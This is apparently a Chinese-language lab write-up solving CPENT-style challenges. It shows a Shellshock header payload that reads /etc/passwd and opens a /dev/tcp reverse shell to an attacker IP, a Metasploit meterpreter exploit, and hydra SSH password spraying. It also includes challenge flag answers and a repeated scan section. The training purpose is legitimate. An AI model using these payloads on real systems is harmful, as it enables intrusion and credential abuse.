下一題:
開場先掃連線埠:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.30.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:29 EDT
Nmap scan report for 172.16.30.5
Host is up (0.062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds
┌──(root㉿kali)-[~]
└─# nmap -p22,80 172.16.30.5 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:31 EDT
Nmap scan report for 172.16.30.5
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 bea6be097c4c944dd7749fda9667c066 (DSA)
| 2048 dfce564cb463a7e54cfc9ac39e2ed086 (RSA)
| 256 191cd822c8c17fc2e2c2ae8e89ab5b0d (ECDSA)
|_ 256 684fc8c87b3537ee07a56f67b715439b (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 61.44 ms 192.168.200.1
2 11.16 ms 172.16.30.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds
有80 port就先翻翻內部的目錄:
┌──(root㉿kali)-[~]
└─# nikto -host http://172.16.30.5
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.30.5
+ Target Hostname: 172.16.30.5
+ Target Port: 80
+ Start Time: 2023-03-26 04:04:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 5e19588e4cd5f, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8726 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-03-26 04:06:49 (GMT-4) (156 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root㉿kali)-[~]
└─# dirb http://172.16.30.5
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Mar 26 04:08:40 2023
URL_BASE: http://172.16.30.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.30.5/ ----
==> DIRECTORY: http://172.16.30.5/cgi-bin/
+ http://172.16.30.5/cgi-bin/ (CODE:403|SIZE:286)
+ http://172.16.30.5/index.html (CODE:200|SIZE:11510)
+ http://172.16.30.5/server-status (CODE:403|SIZE:291)
---- Entering directory: http://172.16.30.5/cgi-bin/ ----
+ http://172.16.30.5/cgi-bin/keygen (CODE:200|SIZE:153)
-----------------
END_TIME: Sun Mar 26 04:10:36 2023
DOWNLOADED: 9224 - FOUND: 4
用了dirb後爆破出來的目錄還是很少,所以用gobuster:
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://172.16.30.5 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.30.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/03/26 04:15:57 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 283]
/cgi-bin (Status: 301) [Size: 311] [--> http://172.16.30.5/cgi-bin/]
/.htm (Status: 403) [Size: 282]
/. (Status: 200) [Size: 11510]
/.htaccess (Status: 403) [Size: 287]
/.htc (Status: 403) [Size: 282]
/.html_var_DE (Status: 403) [Size: 290]
/server-status (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 287]
/.html. (Status: 403) [Size: 284]
/.html.html (Status: 403) [Size: 288]
/.htpasswds (Status: 403) [Size: 288]
/.htm. (Status: 403) [Size: 283]
/.htmll (Status: 403) [Size: 284]
/.html.old (Status: 403) [Size: 287]
/.html.bak (Status: 403) [Size: 287]
/.ht (Status: 403) [Size: 281]
/.htm.htm (Status: 403) [Size: 286]
/.hta (Status: 403) [Size: 282]
/.htgroup (Status: 403) [Size: 286]
/.html1 (Status: 403) [Size: 284]
/.html.printable (Status: 403) [Size: 293]
/.html.LCK (Status: 403) [Size: 287]
/.htm.LCK (Status: 403) [Size: 286]
/.htaccess.bak (Status: 403) [Size: 291]
/.html.php (Status: 403) [Size: 287]
/.htx (Status: 403) [Size: 282]
/.htmls (Status: 403) [Size: 284]
/.html- (Status: 403) [Size: 284]
/.htm2 (Status: 403) [Size: 283]
/.htlm (Status: 403) [Size: 283]
/.htuser (Status: 403) [Size: 285]
/.htacess (Status: 403) [Size: 286]
/.htm.d (Status: 403) [Size: 284]
/.htm.html (Status: 403) [Size: 287]
/.htm.old (Status: 403) [Size: 286]
/.html-1 (Status: 403) [Size: 285]
/.html.orig (Status: 403) [Size: 288]
/.html_ (Status: 403) [Size: 284]
/.html.sav (Status: 403) [Size: 287]
/.htmlprint (Status: 403) [Size: 288]
/.htmlpar (Status: 403) [Size: 286]
/.html_files (Status: 403) [Size: 289]
/.hts (Status: 403) [Size: 282]
/.htaccess.old (Status: 403) [Size: 291]
/.htm.rc (Status: 403) [Size: 285]
/.htm.bak (Status: 403) [Size: 286]
/.htm8 (Status: 403) [Size: 283]
/.htm7 (Status: 403) [Size: 283]
/.htm5 (Status: 403) [Size: 283]
/.htm3 (Status: 403) [Size: 283]
/.html-0 (Status: 403) [Size: 285]
/.html-- (Status: 403) [Size: 285]
/.htm_ (Status: 403) [Size: 283]
/.html.htm (Status: 403) [Size: 287]
/.html-p (Status: 403) [Size: 285]
/.html-old (Status: 403) [Size: 287]
/.html-c (Status: 403) [Size: 285]
/.html-2 (Status: 403) [Size: 285]
/.html.inc (Status: 403) [Size: 287]
/.html.pdf (Status: 403) [Size: 287]
/.html.none (Status: 403) [Size: 288]
/.html.images (Status: 403) [Size: 290]
/.html7 (Status: 403) [Size: 284]
/.html5 (Status: 403) [Size: 284]
/.html4 (Status: 403) [Size: 284]
/.html.txt (Status: 403) [Size: 287]
/.html.start (Status: 403) [Size: 289]
/.htmla (Status: 403) [Size: 284]
/.html_old (Status: 403) [Size: 287]
/.htmlDolmetschen (Status: 403) [Size: 294]
/.htmlBAK (Status: 403) [Size: 286]
/.htmlu (Status: 403) [Size: 284]
/.htmlq (Status: 403) [Size: 284]
/.htmlfeed (Status: 403) [Size: 287]
/.htmlc (Status: 403) [Size: 284]
/.htn (Status: 403) [Size: 282]
Progress: 119405 / 119601 (99.84%)
===============================================================
2023/03/26 04:20:21 Finished
===============================================================
對下一層cgi-bin也用gobuster爆破:
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://172.16.30.5/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,301 --status-codes-blacklist ''
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.30.5/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 200,301
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/03/26 04:29:30 Starting gobuster in directory enumeration mode
===============================================================
/keygen (Status: 200) [Size: 153]
Progress: 119504 / 119601 (99.92%)
===============================================================
2023/03/26 04:33:51 Finished
===============================================================
-s 200,301 --status-codes-blacklist ''代表只列出這兩個status的目錄,也就是只列出實際存在且可存取的目錄。所以可以看一下keygen:
看到aoache跟cgi-bin,第一個直覺是shellshock:
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
4 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
5 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
6 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
9 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
10 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
11 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec
先用2號,掃掃看是不是真的有漏洞:
msf6 > use 2
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-20
14-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:por
t][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/d
ocs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set rhosts 172.16.30.5
rhosts => 172.16.30.5
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run
[-] Msf::OptionValidateError The following options failed to validate: TARGETURI
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/keygen
TARGETURI => /cgi-bin/keygen
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run
[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
shellshock手工測試的方法:
Test Whether a Server Is Vulnerable to Shellshock Bug | Baeldung on Linux
根據以上網頁,打指令如下:
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" http://172.16.30.5/cgi-bin/keygen
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at
webmaster@localhost to inform them of the time this error occurred,
and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 172.16.30.5 Port 80</address>
</body></html>
可以發現沒有把/etc/passwd給讀出來
把上面的指令,改成不是讀passwd,而是反向連線:
curl -H "User-Agent: () { :; }; /bin/bash - >& /dev/tcp/192.168.200.4/443 0>&1" http://172.16.30.5/cgi-bin/keygen
在打以上指令之前,要先開另一個cmd監聽:
┌──(root㉿kali)-[~]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.200.4] from (UNKNOWN) [172.16.30.5] 49109
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/cgi-bin$
可以發現成功reverse shell
www-data@ubuntu:/var/www/html/cgi-bin$ cd /
cd /
www-data@ubuntu:/$ find / -name secret.txt -print 2>/dev/null
find / -name secret.txt -print 2>/dev/null
/home/jason/Documents/secret.txt
www-data@ubuntu:/$ cat /home/jason/Documents/secret.txt
cat /home/jason/Documents/secret.txt
hb74kpm9h83
以下是用剛剛網站裡面的nmap來下指令:
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/keygen,cmd=ls 172.16.30.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 05:09 EDT
Nmap scan report for 172.16.30.5
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.7 (Ubuntu) Server at 172.16.30.5 Port 80</address>
| </body></html>
|
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://seclists.org/oss-sec/2014/q3/685
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
確定有shellshock漏洞後,也可以繼續用metaspolit來攻擊:
┌──(root㉿kali)-[~]
└─# msfconsole
`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
4 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
5 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
6 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
9 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
10 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
11 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, C
VE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.
com/docs/using-metasploit/basics/using-metasploi
t.html
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is ran
domly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is rand
om)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lport 443
lport => 443
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 172.16.30.5
rhosts => 172.16.30.5
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/keygen
targeturi => /cgi-bin/keygen
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost 192.168.200.4
lhost => 192.168.200.4
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.200.4:443
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 172.16.30.5
[*] Meterpreter session 1 opened (192.168.200.4:443 -> 172.16.30.5:49110) at 2023-03-26 05:58:00 -0400
meterpreter >
選1號是因為它的名字裡有apache,跟現在環境相似。成功入侵後,就可以開始找檔案:
meterpreter > shell
Process 3177 created.
Channel 1 created.
find / -name secret.txt -print 2>/dev/null
/home/jason/Documents/secret.txt
cat /home/jason/Documents/secret.txt
hb74kpm9h83
老梗偵察:
┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 172.16.20.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:42 EDT
Nmap scan report for 172.16.20.7
Host is up (0.039s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 30.31 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p22 172.16.20.7 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:43 EDT
Nmap scan report for 172.16.20.7
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1619792a62e3e6e83345234167c17b99 (RSA)
| 256 4d34eb934802773e1160177936e1bb4f (ECDSA)
|_ 256 f38fb12d46333961a74faf68320c0310 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (93%), Linux 3.10 - 3.16 (93%), Linux 4.9 (93%), Linux 4.0 (93%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 62.31 ms 192.168.200.1
2 10.14 ms 172.16.20.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.80 seconds
只有ssh,所以爆破。注意帳密檔要用官方提供的。另外要注意,如果直接用以下指令:
hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7
會很花時間,所以要用密碼噴灑攻擊,詳情可參見以下網址:
Using Hydra to Spray User Passwords
總之最後面要有個-u參數。
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-26 03:53:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.20.7:22/
[22][ssh] host: 172.16.20.7 login: jason password: qwerty
[STATUS] 322.00 tries/min, 322 tries in 00:01h, 1501 to do in 00:05h, 13 active
[STATUS] 317.67 tries/min, 953 tries in 00:03h, 871 to do in 00:03h, 12 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-26 03:57:36
爆破成功,ssh登入:
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# ssh jason@172.16.20.7
The authenticity of host '172.16.20.7 (172.16.20.7)' can't be established.
ED25519 key fingerprint is SHA256:4uiYffWeZsCsbqxYDpnCxpCpI9a5xqSAytffNxlSD60.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.20.7' (ED25519) to the list of known hosts.
jason@172.16.20.7's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Mar 26 18:13:49 CST 2023
System load: 0.0 Processes: 119
Usage of /: 3.2% of 124.01GB Users logged in: 2
Memory usage: 11% IP address for eth0: 172.16.20.7
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
298 packages can be updated.
196 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Sep 24 10:01:15 2022 from 172.16.1.1
jason@ubuntu:~$
getshell後開始找第一個flag:
jason@ubuntu:~$ cd /
jason@ubuntu:/$ find -name userflag.txt -print 2>/dev/null
./home/jason/Documents/userflag.txt
jason@ubuntu:/$ cat ./home/jason/Documents/userflag.txt
bu79g82xap
jason@ubuntu:/$ md5sum ./home/jason/Documents/userflag.txt
c43b63f879784511a5914c7ee930d5bf ./home/jason/Documents/userflag.txt
接下來想提權,所以想把枚舉用的腳本(linenum跟linpeas)弄到靶機裡,所以先架個簡易server:
┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
切換到tmp資料夾才有寫入權限:
jason@ubuntu:/$ cd /tmp
jason@ubuntu:/tmp$ wget http://192.168.200.4/LinEnum.sh
--2023-03-26 18:24:20-- http://192.168.200.4/LinEnum.sh
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’
LinEnum.sh 100%[===============================>] 45.54K --.-KB/s in 0.06s
2023-03-26 18:24:20 (804 KB/s) - ‘LinEnum.sh’ saved [46631/46631]
jason@ubuntu:/tmp$ ls -al
total 88
drwxrwxrwt 10 root root 4096 Mar 26 18:24 .
drwxr-xr-x 23 root root 4096 Dec 23 2021 ..
drwxrwxrwt 2 root root 4096 Dec 23 2021 .font-unix
drwxrwxrwt 2 root root 4096 Dec 23 2021 .ICE-unix
-rw-rw-r-- 1 jason jason 46631 Mar 12 16:03 LinEnum.sh
drwx------ 3 root root 4096 Dec 23 2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-resolved.service-T3HiFE
drwx------ 3 root root 4096 Dec 23 2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-timesyncd.service-tZ652O
drwxrwxrwt 2 root root 4096 Dec 23 2021 .Test-unix
drwx------ 2 itop itop 4096 Feb 23 2022 tmux-1000
drwxrwxrwt 2 root root 4096 Dec 23 2021 .X11-unix
drwxrwxrwt 2 root root 4096 Dec 23 2021 .XIM-unix
jason@ubuntu:/tmp$ chmod +x LinEnum.sh
用同樣手法,讓靶機下載linpeas這個腳本:
5 (Challenge 29) Compromise the machine with IP address 172.25.20.7, find the file userflag.txt and enter its content as the answer.
6 (Challenge 30) Compromise the machine with IP address 172.25.20.7, find the file rootflag.txt, and enter its content as the answer.
根據這兩題,可以知道要先get shell拿userflag,再提權拿rootflag。
先掃:
┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 172.16.20.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:42 EDT
Nmap scan report for 172.16.20.7
Host is up (0.039s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 30.31 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p22 172.16.20.7 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 03:43 EDT
Nmap scan report for 172.16.20.7
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1619792a62e3e6e83345234167c17b99 (RSA)
| 256 4d34eb934802773e1160177936e1bb4f (ECDSA)
|_ 256 f38fb12d46333961a74faf68320c0310 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
